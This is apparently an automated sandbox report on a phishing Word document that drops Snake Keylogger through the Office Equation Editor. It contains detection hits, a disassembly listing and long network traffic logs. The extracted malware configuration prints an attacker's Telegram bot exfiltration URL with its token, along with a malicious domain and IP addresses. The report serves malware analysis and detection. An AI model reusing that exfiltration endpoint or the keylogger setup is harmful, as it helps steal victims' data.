Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2160, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2352, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000006.00000002.610871385.0000000002571000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot5611396317:AAGsgxx4hwlHZa8kVodTZpCQipWRFwFvBO0/sendMessage?chat_id=5237953097"}

Multi AV Scanner detection for domain / URL

Source: dukeenergyltd.top	Virustotal: Detection: 25%			Perma Link
Source: https://dukeenergyltd.top/	Virustotal: Detection: 24%			Perma Link

Multi AV Scanner detection for submitted file

Source: ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc

ReversingLabs: Detection: 42%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\mpoom[1].scr	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Joe Sandbox ML: detected

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 172.67.134.136 Port: 443

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\mpoom39002.scr
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\mpoom39002.scr			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 172.67.134.136:443 -> 192.168.2.22:49161 version: TLS 1.2

Source:

Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: mpoom39002.scr, 00000005.00000002.346550493.0000000002201000.00000004.00000800.00020000.00000000.sdmp, mpoom39002.scr, 00000005.00000002.346411326.0000000000330000.00000004.08000000.00040000.00000000.sdmp

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 001F6437h	6_2_001F608D
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 001FF3E1h	6_2_001FF128
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 001FFC91h	6_2_001FF9D8
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 001F5481h	6_2_001F51C1
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 001F6CF7h	6_2_001F6A38
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 001F75B7h	6_2_001F72F8
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	6_2_001F3B30
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 001FF839h	6_2_001FF580
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 001F6897h	6_2_001F65D9
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 001F5A43h	6_2_001F5630
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 001F7157h	6_2_001F6E99
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 001F5A43h	6_2_001F5972
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	6_2_001F4162
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	6_2_001F4342
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 001F5A43h	6_2_001F5620
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 001F50FCh	6_2_001F47FD
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003F84D1h	6_2_003F8228
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003F4CC1h	6_2_003F4A18
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003F32B1h	6_2_003F3008
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003F9AB1h	6_2_003F9808
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003F3709h	6_2_003F3460
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003F9F09h	6_2_003F9C60
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003F1CF9h	6_2_003F1A50
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003F02E9h	6_2_003F0040
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003FB4E9h	6_2_003FB240
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003F3B61h	6_2_003F38B8
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003F2151h	6_2_003F1EA8
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003F8951h	6_2_003F86A8
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003F0741h	6_2_003F0498
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003FB941h	6_2_003FB698
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003F0B99h	6_2_003F08F0
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003FBD99h	6_2_003FBAF0
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003FA38Ah	6_2_003FA0E0
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003FA7E1h	6_2_003FA538
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003F3FB9h	6_2_003F3D10
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003F25A9h	6_2_003F2300
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003F8DA9h	6_2_003F8B00
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003F4411h	6_2_003F4168
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003F2A01h	6_2_003F2758
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003F9201h	6_2_003F8F58
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003F0FF1h	6_2_003F0D48
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003FC1F1h	6_2_003FBF48
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003F2E59h	6_2_003F2BB0
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003F9659h	6_2_003F93B0
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003F1449h	6_2_003F11A0
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003FAC39h	6_2_003FA990
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003F18A1h	6_2_003F15F8
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003FB091h	6_2_003FADE8
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then jmp 003F4869h	6_2_003F45C0
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	6_2_003F6458
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	6_2_003F644A
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	6_2_003F676E

Source: global traffic	DNS query: name: dukeenergyltd.top
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 193.122.6.168:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
